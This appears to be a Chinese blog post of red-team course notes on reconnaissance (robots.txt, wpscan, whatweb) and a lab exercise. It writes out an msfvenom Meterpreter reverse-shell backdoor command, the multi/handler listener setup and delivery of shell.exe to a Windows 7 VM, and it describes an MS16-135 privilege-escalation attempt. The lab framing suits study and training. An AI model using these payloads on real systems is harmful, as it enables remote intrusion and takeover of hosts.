IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 网络协议 -> HW-信息收集和外围打点 -> 正文阅读

[网络协议]HW-信息收集和外围打点


前言

好神奇,上一篇什么情况?

emmm

1、DNS查询

在这里插入图片描述
2、HTTP

get请求,URL传参

General--------

Request URL:

Request Method:

Status Code:

Remote Address:远程服务器

3、信息收集

第一步:找robots.txt

1、有可能暴露后台地址、使用的系统

如果发现使用的是wordPress,可以使用wpscan扫描一下看看漏洞

https://github.com/wpscanteam/wpscan/wiki/WPScan-User-Documentation------wpscan的用户文档

第二:使用子域名挖掘机看一下子域名

第三:通过子域名,查看后台系统,根据后台系统查看站点官网,找到案例

Wpscan

在kaili中安装,看是否有wordpress有关的漏洞

这个api token 在https://wpscan.com/的个人资料页面,当然注册完是给免费的

apt-get update

apt install wpscan -y


wpscan --url http://www.xxxx.cn --api-token (这里写wpscan官网给的api令牌)   

在这里插入图片描述

服务器用的nginx

在这里插入图片描述

额,,,有两个漏洞

靠,写了一点,网页崩了,TMD重新写

whatweb

wahtweb可以看到网站使用了什么技术

apt-get install whatweb

whatweb www.xxx.cn

在这里插入图片描述

三个渗透框架

1、msfvenom


生成一个后门

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.94.142 LPORT=1234 -f exe >shell.exe 

msfvenom -p--------------payload攻击载荷

windows/meterpreter/reverse_tcp--------------一个分段staged载荷,reverse_tcp是一个基于TCP的反向链接反弹shell

LHOST=192.168.94.142 LPORT=1234--------------攻击者)的本地主机地址(LHOST)和端口号(LPORT)

-f exe--------------------------文件格式

在这里插入图片描述

msfconsole--------监听模块

use exploit/multi/handler--------使用监听模块

set payload windows/meterpreter/reverse_tcp----------------设置payload

set lhost 192.168.94.142

set lport 1234

设置监听端口和ip与之前生成的木马一致

exploit----------开始

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

终于

因为是测试环境

就直接把这个木马传到win7上

把这个shell弄到了虚拟机的win7里

要在kali中安装apache2,然后删除/var/www/html中的index.html,因为之前已经把shell.exe移动到了/var/www/html目录中

用win7访问,直接下载

在这里插入图片描述

先看一下win7的权限

在这里插入图片描述
…百度了好多,说是这个用户登录进去不是域成员????

直接运行shell吧

在这里插入图片描述
提权失败,,,,后面的笔记就看不太懂了

ms16_135内核提权

先去win7上看哪些补丁打了哪些没打

在这里插入图片描述

使用windows-exploit-suggester.py看究竟是什么内核没有补上

(不行啊,找不到,用老师的图)
在这里插入图片描述

用了一个github上的ms16_135的windows-kernel-exploits/MS16-135/MS16-135.ps1

的一个powershell

进入到powershell中执行这个ps1

执行完后提权

如果直接弹回来一个shell很有可能就成功了

。。。。

2、empire框架

  网络协议 最新文章
使用Easyswoole 搭建简单的Websoket服务
常见的数据通信方式有哪些?
Openssl 1024bit RSA算法---公私钥获取和处
HTTPS协议的密钥交换流程
《小白WEB安全入门》03. 漏洞篇
HttpRunner4.x 安装与使用
2021-07-04
手写RPC学习笔记
K8S高可用版本部署
mySQL计算IP地址范围
上一篇文章      下一篇文章      查看所有文章
加:2022-04-15 00:40:35  更:2022-04-15 00:40:45 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/26 3:25:03-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码